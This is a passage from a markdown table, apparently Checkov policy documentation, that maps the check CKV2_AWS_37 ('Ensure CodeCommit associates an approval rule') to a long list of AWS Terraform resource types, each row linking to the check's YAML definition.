resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 940 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 941 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 942 | CKV2_AWS_37 | resource | aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 943 | CKV2_AWS_37 | resource | aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 944 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 945 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 946 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 947 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 948 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 949 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 950 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 951 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 952 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 953 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 954 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 955 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 956 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 957 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 958 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 959 | CKV2_AWS_37 | resource | 
aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 960 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 961 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 962 | CKV2_AWS_37 | resource | aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 963 | CKV2_AWS_37 | resource | aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 964 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 965 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 966 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 967 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 968 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 969 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 970 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 971 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 972 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 973 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 974 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 975 | CKV2_AWS_37 | resource | aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 976 | CKV2_AWS_37 | resource | aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 977 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 978 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 979 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 980 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 981 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 982 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 983 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 984 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 985 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 986 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 987 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 988 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 989 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 990 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 991 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 992 
| CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 993 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 994 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 995 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 996 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 997 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 998 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 999 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1000 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1001 | CKV2_AWS_37 | resource | aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1002 | CKV2_AWS_37 | resource | aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1003 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1004 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1005 | CKV2_AWS_37 | 
resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1006 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1007 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1008 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1009 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1010 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1011 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1012 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1013 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1014 | CKV2_AWS_37 | resource | aws_datasync_location_smb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1015 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1016 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1017 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1018 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1019 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1020 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1021 | CKV2_AWS_37 | resource | aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1022 | CKV2_AWS_37 | resource | aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1023 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1024 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1025 | CKV2_AWS_37 | resource | 
aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1026 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1027 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1028 | CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1029 | CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1030 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1031 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 
1032 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1033 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1034 | CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1035 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1036 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1037 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1038 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1039 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1040 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1041 | CKV2_AWS_37 | resource | aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1042 | CKV2_AWS_37 | resource | aws_dms_replication_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1043 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1044 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | 